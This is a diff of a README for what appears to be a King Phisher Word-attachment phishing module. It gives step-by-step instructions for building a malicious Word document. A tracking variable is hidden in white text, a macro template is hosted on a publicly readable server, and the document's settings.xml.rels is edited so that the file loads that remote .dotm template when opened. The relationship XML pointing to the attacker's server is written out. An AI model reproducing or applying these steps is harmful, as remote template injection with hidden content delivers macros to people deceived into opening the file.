samira-karimi-elfiman/king-phisher-word-attcachment/README.md

     End Function

-5- Create the Word file with the template defined in the previous step.
-Create the Word file with the template defined in the previous step and just write the following command in it and whiten its color.
+5- Create the Word file with the template defined in the previous step and just write the following command in it and whiten its color.

     {{ secret_id }}

 note: All config variables are returned in the code and you can define each of them in your Word file according to your needs.

+6- After completing these steps, you place the template file created in step 4 on the server and change its premission so that it can be downloaded by everyone.
+Then you have to put the address of this file in the created Word file.To do this, zip the Word file and extract it and go to the following path:

+    word_rels\settings.xml.rels

+And replace the dotm file address with its local address in the Target section. see code below

+    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+    <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://[web_server_address]/[name].dotm" TargetMode="External"/>     </Relationships>